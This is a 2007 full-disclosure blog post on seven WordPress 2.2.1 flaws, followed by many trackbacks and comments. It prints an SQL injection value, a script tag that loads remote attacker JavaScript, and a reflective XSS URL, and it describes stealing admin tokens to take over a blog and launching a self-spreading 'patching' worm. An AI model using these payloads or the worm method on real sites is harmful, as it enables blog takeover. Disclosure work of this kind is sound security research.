Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm (updated)
July 31st, 2007Much time has passed since I wrote the last Full Disclosure Publication on this Blog, it was about the security vulnerability in Akismet, a Wordpress antispam plugin.
This time you will witness something which impacts huge parts of the Blogosphere, I will tell you my story:
Yesterday, I discovered five seven new Wordpress vulnerabilities which may lead to a successful blog compromise under appropriate circumstances
1. Wordpress Persistant XSS Vulnerability in the Default Theme (v.2.2)
Affected Script: /themes.php?page=functions.php
“Header Image and Color” section of the Default Theme Kubrick.
Severity: HIGH - Attack needs no authentication.
Affected Wordpress Build: 2.2 (I know this has been submitted to full-disclosure before but I already wrote down the article and made the sample exploits so I did not want to delete these parts afterwards)
WARNING: This issue may lead to a full blog compromise if the default theme is enabled!
The vulnerability is some weeks old and because of that I don’t include it in my Wordpress PoC XSS Blog Worm - more on this topic at the end of this post.
2. Wordpress /options.php SQL Injection Vulnerability
Affected Scripts: All Wordpress files referencing /options.php in a form field, this includes:
/options-general.php/options-writing.php/options-reading.php/options-discussion.php/options-privacy.php/options-permalink.php/options-misc.php
Severity: LOW - Attacker needs Admininstrator Privileges or valid _wpnonce.
Affected Wordpress Version: 2.2.1 - the latest version (This is a 0day Vulnerability)
So what causes this Database Error shown on the Screenshot?
When one of the scripts listed above sends a post request to /options.php, the value of page_options is NOT filtered.
This allows any user having Admin Privileges to manipulate Database queries and/or Values. Of course this can be used for further exploitation as I’ll show in the next part of this advisory.
By the way, the affected SQL query is
SELECT option_value FROM wcblog_options
WHERE option_name = ‘$page_options‘.
So $page_options may be used for SQL Injection, that means if it contains a value like ' AND '1'='1, the query is processed successfully AND a new key called $page_options will be created in the database table wp_options.
Some of you, my dear readers, may have noticed that now, we have the ability to create new database keys plus corresponding values. This smells of persistant XSS, and another Wordpress Feature is helping us here:
3. Wordpress /options.php Information Disclosure
Severity: MEDIUM - All Blog Options are listed on a single page and may be accessed for example via XSS
Affected Wordpress Version: 2.2.1 - the latest version (This is a 0day Vulnerability)
Why is this a security risk categorized as MEDIUM?
If /options.php is accessed by an Administrator without any given parameters, it just dumps the whole Database Table wp_options, including all Blog settings like the secret hash, the Administrator’s email addresses and other configuration stuff.
The whole script is running WITHOUT ANY OUTPUT VALIDATION - we can trust the data coming from our own Database, can we?!
And this very issue leads us directly towards another, much more critical threat:
4. Wordpress /options.php Persistant XSS Vulnerability
Severity: MEDIUM - Persistant XSS in the Admin Panel, nevertheless, the Attacker needs Admininstrator Privileges or valid _wpnonce.
Affected Wordpress Version: 2.2.1 - the latest version (This is a 0day Vulnerability)
Let’s assume an Attacker is able to combine Points 2) and 3) of this post by using an XSS Vulnerability. The XSS flaw may exist either the Blog Software itself (in this case “Wordpress”), a third-party plugin or other custom-made scripts on the same webserver/domain.
This would allow a complete Blog overtake, wouldn’t it? The cocept behind this combined XSS / CSRF Attack is:
- Use an XSS flaw and Vulnerability 2) in combination to insert something like
<script src=http://yourpage.com/attack.js ></script>into the Wordpress Options Database Table.
Of course, before doing this, you need to extract the_wpnonceWordpress Administration Panel Token by using some magic Javascript code and XMLHttpRequest - this is very basic Javascript stuff and easy to accomplish by an skilled Attacker. - Afterwards, you just have to send the Administrator to
/options.phpand the Javascript Code will be executed.
5. Wordpress /edit-comments.php Database Error (Bug)
Severity: NONE
Affected Wordpress Version: 2.2.1 - the latest version
In /edit-comments.php, the parameter apage is not properly sanitized before it is used to calculate the rows from which Wordpress tries to pull the comments from.
So in case apage has a negative numerical value, Wordpress throws a Database Error caused by an corrupted SQL Query which can be seen in the picture. It tries to SELECT all data from the table between rows -40 and 25, and this - of course - does not work 
6. Wordpress /link-import.php XSS Vulnerability
Severity: LOW - Attacker needs Admininstrator Privileges or valid _wpnonce.
Affected Wordpress Version: 2.2.1 - the latest version (This is a 0day Vulnerability)
The parameter opml_url isn’t sanitized and thereby creates an Cross-Site Scripting vulnerability.
Anyways, for a successful attack the _wpnonce Authentication Token is needed so this one is quite useless - No one would use XSS to get a Token in order to use another XSS Vulnerability on the same Domain.
As usual, I made a shiny picture of this flaw “in action” 
7. Wordpress /upload.php XSS Vulnerability
Severity: HIGH - Attack needs no authentication.
Affected Wordpress Version: 2.2.1 - the latest version (This is a 0day Vulnerability)
WARNING: This issue may lead to a full blog compromise.
In /upload.php the parameter style is prone to XSS Attacks when editing Temporary Uploads (they usually have a negative ID). An attack could look like this: /upload.php?style=%22%3E{shellcode}&tab=upload&post_id=-1337
As you can see this is a very basic reflective XSS vulnerability. This shouldn’t happen within a Web Application.
If you have read my post up to this point I may have convinced you that XSS Blog worms affecting “real” Homepages are more than just a theory, this concept is ready to attack.
During my Research on this “Wordpress Vulnerability Assessment” - it took 2 (TWO!) days to find these flaws - I realized again that Cross-Site Scripting is the most dangerous threat out there: It is able to cause everything from a harmless Defacement or a single Blogpost up to a manipulation of the Theme’s PHP files to include a Remote shell or the enabling of the Post-via-Email Feature - a very funny Wordpress “Feature”.
Some more things XSS can do to your Blog using the upper Vulnerabilities:
- Grab your Blog’s complete RSS Feed using Wordpress’ built-in “Export” function.
- Add some new Blog posts with funny ads, more exploits or random jokes by including an remote Feed using Wordpress’ built-in “Import” function.
- Add Blogroll Links
- Add another Administrator with Password “test”
- Delete your Blogposts (that sucks)
- manipulate Plugins
- change any .php file stored within the Wordpress Directories by using Wordpress’ built-in File Editor
- just everything you as an Blog Administrator can do…
And this is why XSS flaws are the most dangerous vulnerabilities in the wild, and it is sad that so many homepage are affected. Not only your small Wordpress Blogs but also Google, Ebay, Blogspot and nearly every member of the Alexa Top 500.
XSS takes this huge leap by controlling vulnerable Web Applications’ User interfaces so gallantly cross browser and cross platform .. it just rocks!
Based on these Exploits I will create a Proof-of-Concept XSS Wordpress Worm which will try to fix these Vulnerabilities. :o)
– Benjamin Flesch
mybeNi websecurity
UPDATE:
I submitted the Links to the Wordpress Bugtracker:
- Wordpress uploads.php Cross-Site Scripting Vulnerability
- Wordpress options.php SQL Injection Vulnerability
- Wordpress link-import.php Cross-Site Scripting (XSS) Vulnerability
- Wordpress /edit-comments.php Database Error (Bug)
The XSS BlogWorm patching the Vulnerabilities is launched now!
Did you Like this Post? Try these ones! :)
One-time executing JavaScript Payload on March 21st, 2007
How to list the Filesystems, Partition Tables and Hard Disks in Ubuntu Linux? on August 11th, 2007
Viral Marketing or The Best Newsletter Ever on July 19th, 2007
What is the ideal size for a swap (swp) Partition in Linux? on September 21st, 2007
How to set up NFS and How to Share Files in a local network with Ubuntu Linux? on August 31st, 2007
July 31st, 2007 at 02:19
[…] my small world full of websecurity, overall security, safety and… security in the web. nah, kiddin’ « previous post: Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm […]
July 31st, 2007 at 04:31
[…] AJAX XSS Worm for Wordpress published: July 31st, 2007 beNi has discovered several interesting vulnerabilities for Wordpress and has coded a friendly AJAX XSS worm that […]
July 31st, 2007 at 05:33
[…] algunas horas acaban de reportar 7 problemas de seguridad en […]
July 31st, 2007 at 05:42
[…] beNi released 7 zero-day vulnerabilities for WordPress today as well as a the first weblog worm, which topic has interested me for some time now… […]
August 1st, 2007 at 01:31
[…] More here. […]
August 1st, 2007 at 05:20
[…] http://mybeni.rootzilla.de/mybeNi/2007/wordpress_zeroday_vulnerability_roundhouse_kick_and_why_i_nea… […]
August 1st, 2007 at 06:54
[…] gefährliche Lücken in Wordpress Der Tecchannel berichtet heute, dass der IT-Sicherheitsspezialist Benjamin Flesch sieben neue Lücken in Wordpress gefunden hat, die “hauptsächlich […]
August 1st, 2007 at 07:37
[…] acabo de leer en buayacorp hace algunas horas acaban de reportar 7 problemas de seguridad en […]
August 1st, 2007 at 08:56
[…] Was soll man davon halten: This is the first Weblog XSS Worm? Mehr zu den betroffenen 7 Lücken im Bloggingsystem: Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm (updated). […]
August 1st, 2007 at 09:35
WordPress XSS 和 worm…
用補洞來做 XSS 的示範 ? o_O
今天看到一篇文章,說有人找到了 7 個 WordPress 的 XSS 漏洞 (他已經跟總站報告了,不過 patch 好像還沒進去,詳情請看 #4689、#4690、#4691、#4692);而且為了 demo 這些 XS…
August 1st, 2007 at 11:26
[…] de Wordpress que pueden conducir a un compromiso acertado del blog bajo circunstancias apropiadas. Todos están detallados en su blog, pero lo especial es que ha creado una prueba de concepto de un gusano que afecta el popular […]
August 1st, 2007 at 12:49
[…] davon 2 als kritisch eingestuft, in der beliebten Blogsoftware Wordpress entdeckt. Auf seinem privaten Blog stellt er hierzu weitere Informationen, sowie einen Proof-Of-Concept Blogwurm vor, der mit Hilfe […]
August 1st, 2007 at 02:24
Sieben neue Lücken in Wordpress…
Betroffen ist Version 2.2.1 und Abhilfe wird es wohl erst in 2.2.2 geben. Nein, ich reg mich diesmal nicht auf!
……
August 1st, 2007 at 02:37
[…] TecChannel.de bekommen (hier und hier). Es ist nmlich so, dass Benjamin Flesch in WordPress 2.2.1 sieben Lcken entdeckt hat und dafr einen freundlich gesinnten Wurm geschrieben hat, der die Lcke nicht ausnutzt sondern […]
August 1st, 2007 at 04:21
[…] Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm (updated)… Yesterday, I discovered five seven new Wordpress vulnerabilities which may lead to a successful blog compromise under appropriate circumstances (tags: security wordpress) […]
August 1st, 2007 at 04:25
[…] vulnerabilidades de seguridad graves de Wordpress han sido descubiertas por Benjamin Flesch. El equipo de Wordpress ya las ha arreglado pero como no anuncian, lo haré yo. Tu blog se […]
August 1st, 2007 at 10:24
[…] 친구가 WorPress 2.2 XSS 취약점을 이용해서 웜을 만들었다고 한다. (beNi has discovered several interesting vulnerabilities for Wordpress and has coded a friendly AJAX XSS worm that […]
August 1st, 2007 at 11:46
[…] fáciles de entender alex concha ya lo ha hecho y pues volver a escribir lo escrito es algo tonto, también la pagina del autor lo dice muy explicito pero si solo se los recomiendo a los que sepan ingles y de paso les aconsejo que no tomen tan […]
August 2nd, 2007 at 12:37
[…] descubrimiento lo ha hecho Benjamin Flesch, y aunque el equipo de Wordpress lo ha actualizado en el SVN de desarrollo no se ha hecho eco para […]
August 2nd, 2007 at 02:18
[…] von der Blog-Abfertigung hat gestern auf die von IT-Sicherheitsspezialist Benjamin Flesch entdeckten Sicherheitslücken hingewiesen. Benjamin Flesch stuft zwei davon sogar “als Hoch […]
August 2nd, 2007 at 03:30
[…] ist der erste Wordpress Wurm veröffentlicht wurden, der eine Cross Site Scripting (XSS) - Lücke au…. Zum Glück ist er freundlich und hilft Wordpress nutzern dabei, diese direkt zu schliessen. […]
August 2nd, 2007 at 04:19
[…] Klasse, da werden gleich 7 neue Lücken auf einen Schlag in Wordpress 2.2.1 entdeckt. Offizielle Abhilfe gibt es noch nicht, allerdings einen “friendly worm“, der […]
August 2nd, 2007 at 05:25
[…] is all you have to do if you want to patch your current wordpress installation Thanks to Benjamin for this […]
August 2nd, 2007 at 10:02
[…] gesagt: mybeNi hat sieben Lücken in WordPress gefunden und veröffentlicht. Hauptsache man gewöhnt sich nicht langsam an diese Hiobsbotschaften […]
August 2nd, 2007 at 10:17
[…] Weitere Infos hier: this is the first weblog xss worm wordpress zeroday vulnerability […]
August 2nd, 2007 at 10:59
[…] you know that the latest version of Wordpress contains at least seven security vulnerabilities that could compromise your blog ? If you use Wordpress you should make […]
August 2nd, 2007 at 11:10
[…] mybeni genau eine dieser Lücken, um sie zu patchen. Interessanter Proof-Of-Concept-Wurm! Detailliertere Infos inklusive der Möglichkeit die Fehler zu beheben finden sich natürlich…! Share and Enjoy: These icons link to social bookmarking sites where readers can share and […]
August 2nd, 2007 at 12:44
Your script does not check if the files are writable.
Any chance you add that? Otherwise ppl might think they are patched while they are not
August 2nd, 2007 at 02:19
[…] this guy discovered seven vulnerabilities in the latest version of Wordpress and decided to write a worm that will go into your site and […]
August 2nd, 2007 at 03:09
[…] último “lote de agujeros” descubierto en Wordpress incluye nada menos que siete, que no merecerían ningún comentario aquí de no ser por el ingenioso sistema que su descubridor […]
August 2nd, 2007 at 03:28
[…] I’ve been getting a lot of questions about this post by Benjamin Flesch, so here’s a quick […]
August 2nd, 2007 at 04:35
[…] Fleisch hat in Wordpress 2.2.1 7 Sicherheitslücken (XSS-Lücken) entdeckt und diese auch […]
August 2nd, 2007 at 06:50
Wieder mal üble Sicherheitslücken in WordPress…
Eine ganze Reiher neuer Vulnerabilities im beliebtesten Blog-Hosting System schreien nach rascher Abhilfe. Auf Wunsch kümmert sich ein ausnahmsweise freundlicher Wurm um die Schadensprävention.
……
August 2nd, 2007 at 07:32
Siete fallos de seguridad para WordPress 2.2 y 2.0…
La noticia no es “nueva” ya que es de hace unos días pero no la he tratado hasta ahora porque estaba ocupado revisando (dentro de mis limitaciones) código para ver cómo afectaba a la rama 2.0.x.
Como sabeis actualmente se usan dos ramas…
August 2nd, 2007 at 11:49
[…] esta página encontrarán cada una de las vulnerabilidad explicadas debidamente. En esta otra pueden encontrar […]
August 3rd, 2007 at 01:59
Ïåðâûé ÷åðâü äëÿ wordpress…
Âîò òàêàÿ ôèãíÿ ñëó÷èëàñü. Ïîäâåðæåíà âåðñèÿ 2.2, ïðåäûäóùèå âðîäå áû íåò.
Îáíîâëåíèå ÷åðåç ÷àñ: Îäíà(?) èç äûðîê ïðèñóòñòâóåò è â 2.1.1.
Ëå÷èì:
w…
August 3rd, 2007 at 04:24
[…] Artikel auf mybeni.rootzilla.de Artikel auf heise.de […]
August 3rd, 2007 at 05:11
[…] und Cross-Site-Scripting-Lücken - in Wordpress hat Benjamin Flesch in seinem Blog veröffentlicht. Vier dieser Lücken setzen allerdings einen Login als Administrator voraus, was meiner Meinung […]
August 3rd, 2007 at 08:44
[…] se han descubierto 7 nuevos fallos de seguridad en WordPress 2.2.1 (aunque también afectan a la rama […]
August 3rd, 2007 at 09:19
[…] hat nicht nur sieben neue Sicherheitslücken in der aktuellsten Version (2.2.1) von Wordpress gefunden, sondern auch direkt einen […]
August 3rd, 2007 at 05:18
[…] Dienstag sind einige neue Sicherheitslücken in Wordpress 2.2.1 bekannt. Der Entdecker hat sich leider dazu hinreißen lassen, die Lücken ausführlich […]
August 4th, 2007 at 10:42
[…] Flesch points out seven Wordpress XSS exploits that could be used partially or en totalis to create a 0day Wordpress worm that […]
August 5th, 2007 at 02:14
[…] 把wordpress升級到2.2.1,內建Widgets support,並使用了友善的worm來修補漏洞。 […]
August 5th, 2007 at 02:36
[…] handelt es sich um reine Sicherheits-Updates. Die meisten dieser Sicherheitslücken wurden von mybeNi aufgedeckt. Die deutsche Version soll im Laufe des Tages […]
August 5th, 2007 at 02:42
[…] Flesch hat 7 XSS Sicherheitslücken in der WordPress Version 2.2.1 […]
August 5th, 2007 at 02:42
[…] | Wordpress Vor 5 Tagen hatte Benjamin Flesch auf einige neue Sicherheitslücken in WordPress aufmerksam gemacht und daraufhin sogar einen gutartigen Wurm veröffentlicht, der die Probleme unter Ausnutzung der […]
August 5th, 2007 at 05:06
[…] course - like this business is - the Wordpress Developers don’t even mention that I found all these bugs in their Webapplication and even submitted them to their bugtrack which saved them a lot of […]
August 5th, 2007 at 06:08
WordPress 2.2.2 und 2.0.11 Sicherheitsrelease…
Letzte Woche wies mybeni auf verschiedene Sicherheitslücken in den aktuellen WordPress-Versionen hin, die Angriffe per XSS und SQL-Injektionen ermöglichen.
WordPress hat nun auf diese Sicherheitslücken reagiert und zwei Sicherheitsupdat…
August 5th, 2007 at 08:56
[…] consiste in una vulnerabilità cross site scripting riscontrata in uploads.php e segnalata dal blog mybeNi, mentre il ramo 2.0 la vulnerabilità più seria consiste in un Sql injection blind fishing exploit […]
August 5th, 2007 at 09:00
[…] in Wordpress Artikel auf mybeni.rootzilla.de Artikel auf […]
August 5th, 2007 at 11:07
[…] addresses 1 of the 7 security issues found on this page last […]
August 5th, 2007 at 01:00
[…] is a blog entry about 7 Wordpress vulnerabilities that seems to have provoked today’s Wordpress […]
August 5th, 2007 at 03:14
[…] Agosto 5, 2007 @ 9:14 pm } · { Manuales } En 1 solo día, Benjamin Flesch ha descubierto siete vulnerabilidades en Wordpress, las cuales parece ser que ya han sido […]
August 5th, 2007 at 03:28
WordPress Update 2.2.2…
Vor ein paar Tagen sind einige Sicherheitlücken im Wordpress System aufgetaucht. Einer der Entdecker der Lücken hatte zur Schließung auch bereits ein kleines selbstgeschriebenes Script Wurm programmiert, welches die Größten L&#…
August 5th, 2007 at 06:11
[…] has posted 7 zero-day cross site scripting vulnerabilities that todays upgrade fixes. These can be some nasty stuff and could cost you your whole blog if you […]
August 5th, 2007 at 06:36
[…] Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm (updated) […]
August 5th, 2007 at 06:41
[…] motivation, here’s what can happen to you if you don’t upgrade…courtesy of mybeNi, who originally found the […]
August 5th, 2007 at 09:23
too bad most of the hacks here totally screw up the blog….
August 6th, 2007 at 01:54
[…] Benjamin Flesch vor einigen Tagen herausgefunden hat, gibt es in der Version 2.2.1 sieben kleine bis schwere Sicherheitslücken, die auch umgehend nach 6 Tagen vom WordPress Entwickler Team behoben worden […]
August 6th, 2007 at 01:08
[…] addresses 1 of the 7 security issues found on this page last […]
August 7th, 2007 at 09:16
[…] upgrade your install. There has been several security fixes in the new update that address these security exploits here. The upgrade was smooth, all I did was deactivate all my plugins, uploaded the new files […]
August 9th, 2007 at 11:40
[…] That’s what I imagine a Yahoo Sysadmin saying all day. If you really need to use Wordpress, make sure you check for updates periodically - the past showed that this Software bears a lot of flaws! […]
August 14th, 2007 at 05:00
Xss Wordpress Worm promette ma……
Alcuni giorni fa mybeni ha individuato ben sette vulnerabilità nella piattaforma di blogging Wordpress e confermate dalla stessa organizzazione. Sulla scia di questa Full Disclosure lo stesso ricercatore ha realizzato un worm XSS benigno che aiu…
August 23rd, 2007 at 05:32
How do you figure attacks which require admin access are of high severity? Being admin makes doing far fetched SQL injection attacks and reflective XSS kind of pointless, doesn’t it?
That’s like saying there’s a local privilege escalation vulnerability on windows that requires you to be local admin.
August 25th, 2007 at 05:25
Hello Christ1an, the problem is that by using the Admin’s authentication tokens you’d be able to add for example another administator or stuff.. just by using wordpress’ functions.
August 30th, 2007 at 07:54
[…] latest version of Wordpress contains at least seven security vulnerabilities that could compromise your blog. If you use Wordpress you should make sure […]
September 9th, 2007 at 09:08
[…] Source […]
September 11th, 2007 at 05:00
[…] in der Version 2.2.2 zum Download bereit. Wenn Sie noch 2.2.1 verwenden, sollten Sie aufgrund der Sicherheitslücken unbedingt auf die neue Version […]
September 15th, 2007 at 03:27
[…] Wordpress ZeroDay Vulnerability Roundhouse Kick and why mybeNi nearly wrote the first Blog Worm. […]
October 26th, 2007 at 01:58
[…] Read complete article at Rootzilla. […]
November 18th, 2007 at 01:57
[…] Si bien nunca sabremos en realidad lo que puede llegar a estar haciendo el gusano. Según dice su autor lo que hace es parchear WordPress para que no te pueda pasar nada malo, al fin y al cabo si el se […]
December 26th, 2007 at 08:33
[…] Wordpress ZeroDay Vulnerability Roundhouse Kick, a remarkable article on WordPress security vulnerabilities, has been updated to include vulnerabilities in Akismet as well. […]
January 30th, 2008 at 07:23
[…] Further info here. […]
January 30th, 2008 at 11:51
WordPress2.2.1的新漏洞…
31æ¥æ人åå¸äºä¸ä¸ªç¸å ³çæ¼æ´,åå§é¡µé¢:Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm (updated) ~ mybeNi websecurityãå·²ç»è¢«w…
February 8th, 2008 at 05:48
[…] a explicação completa aqui. (em […]
February 15th, 2008 at 03:35
[…] Tips #3 不要使用默认的 Kubrick 主题(V2.2),因为它包含了一个安全漏洞:Header Image and Color 中的 /themes.php?page=functions.php。更多信息。 […]
September 10th, 2008 at 09:13
[…] Further info here. […]
September 13th, 2008 at 09:38
[…] 更多请看 here.。 […]
October 29th, 2008 at 08:21
oh yeah, one more thing I can be ticklish about my ugly museum Sorry, for off top, i wanna tell one joke) What do you call bedtime stories for boats? Ferry tales.
December 1st, 2008 at 07:55
great job! thx